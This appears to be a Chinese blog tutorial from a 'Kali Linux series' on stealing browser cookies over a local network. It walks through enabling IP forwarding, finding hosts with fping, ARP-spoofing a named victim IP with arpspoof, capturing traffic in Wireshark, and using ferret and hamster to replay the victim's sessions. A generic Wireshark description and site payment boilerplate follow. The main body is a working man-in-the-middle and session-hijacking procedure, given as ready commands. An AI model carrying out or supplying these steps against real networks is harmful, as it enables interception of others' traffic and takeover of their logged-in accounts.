wireshark抓取dns_Kali Linux系列之cookie抓取

a07fcdb510f96aafc63c14c170e3d7f8.gif

(你的世界是个什么样的世界?你说,我们倾听!)-----------------

cookie包抓取

小百科

Cookie,有时也用其复数形式 Cookies,指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)。定义于 RFC2109 和 2965 中的都已废弃,最新取代的规范是 RFC6265 [1] 。(可以叫做浏览器缓存)

服务器可以利用Cookies包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。Cookies最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookies的功用。另一个重要应用场合是“购物车”之类处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写入Cookies,以便在最后付款时提取信息。

实验开始

  1. 开启流量转发,这是对攻击的主机进行信息截获,再转发回到攻击主机,让用户不断网,不察觉,因此ARP也叫欺骗工具。
  2. 打开kali linux虚拟机,在终端输入命令,开启流量转发

命令:

echo 1 >/proc/sys/net/ipv4/ip_forward在默认下,/proc/sys/net/ipv4/ip_forward的值是0,流量转发不开启,这时候我们把1替换掉0,也就是值改为1,就开启了流量转发。

我们可以通过以下命令来查看

cat /proc/sys/net/ipv4/ip_forward的值

命令:

cat /proc/sys/net/ipv4/ip_forward

可以看到终端返回一个1,这时候说明流量转发开启了

8a11bbcf1b9866f387fbc84bd0afdfc1.png

3.使用fping工具,获取局域网内的主机IP,选择你要攻击的IP

fping命令格式:

fping -asg 网段/掩码

fping -a:显示可ping同的目标

fping -s:打印统计数据

fping -p:显示ping包间隔

打开我们的kali linux 虚拟机,运行终端,输入fping -asg 网段/掩码

下面进行演示,输入fping -asg 192.168.234.0/24

这时候输出同一网关下的主机IP地址,可以看到我们同一网关下有两台主机在联网,选择你想xx的IP地址

d4d4f630229c01548f93f9e01ecd8afe.png

4.开始运行arp

在终端输入arpspoof -i 网卡名 -t 目标ip 默认网关ip

下面我的输入为 arpspoof -i eth0 -t 192.168.234.128 192.168.234.2

3de90c54d0ca8922134d2f34becdbb05.png

这时候说明信息截获成功,不要关掉这个窗口

5.在终端输入wireshark

打开wireshark,

bd65c7e50ada9369425aaa9fe458a7fd.png

6.点击capture ——>Options

选择网卡eth0,点击 start 开始抓取

81c1e72e818cc0c44f72bf83c7d6f893.png

7.此时在受害者主机上浏览网页,登录某些网站都会被抓取下来

5efc163edc25df3b0172190aabb823d5.png

8.在wireshark中点击红色小正方形,停止抓取

点击fire——>save

选择pcap文件类型

此时可以关掉ARP工具

输入ls可以看到cookie.pcap的文件

0554bec64562b79ef778dfe29b4a36d5.png
fe0902e870105eccb55c34a2b99f288e.png

9.利用ferret重新生成文件

这里先安装ferrte

终端输入:

dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386

即可安装ferret。

再输入:ferret -r cookie.pcap重新生成了文件hamster.txt

输入:ls 可查看

e79ac4f7490f01c24e4ec1f982364450.png

10.执行hamster命令

此时可以看到地址为127.0.0.1 端口为1234

我们在浏览器中设置代理地址

72ada045834485e4d8f20ee7ff71a94f.png
15a109aa01d3aa7a4ea19c39f87da518.png

11.配置完成,在浏览器中输入hamster,点击刚才受害者主机的IP地址

右边的HTTP地址就是刚才受害主机浏览过的网页,点击可以直接跳转

3cea51f3f2e6fb541ccd155ff33609da.png

Kali Linux系列之DNS欺骗

Kali Linux系列之HTTP截获

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux是一种流行的渗透测试和网络安全工具的操作系统,Wireshark是一个开源的网络分析工具。在Kali中使用Wireshark进行抓取网络流量非常简单。 首先,我们需要在终端中打开Wireshark。在Kali中,Wireshark通常默认安装,所以我们可以直接在命令行中输入“wireshark”来打开程序。 一旦Wireshark程序打开,我们会看到一个图形化界面,该界面呈现了当前系统上所有的网络接口。在Wireshark中,我们可以选择要进行抓取的特定接口。例如,如果我们想要抓取WLAN接口的流量,我们可以选择该接口并开始抓取。 点击“开始”按钮后,Wireshark将开始捕获网络流量。我们可以看到Wireshark实时显示来自该接口的流量信息。默认情况下,Wireshark会显示每个数据包的详细信息,包括源IP地址、目标IP地址、协议类型等。 如果我们只想抓取特定IP地址或特定协议的流量,可以在“过滤”框中输入相应的过滤器。例如,如果我们只想抓取源IP地址为192.168.1.1的流量,我们可以在过滤器中输入“ip.src == 192.168.1.1”。 Wireshark还提供了许多高级功能,例如统计信息、数据流分析、重放网络流量等。我们可以通过菜单栏上的不同选项来访问这些功能。 要停止抓取网络流量,只需点击Wireshark界面上的“停止”按钮即可。在停止后,我们可以保存抓取到的数据包,以供后续分析。 总之,WiresharkKali中强大而实用的网络抓包工具,可以帮助渗透测试人员或网络管理员分析网络流量,识别潜在的安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值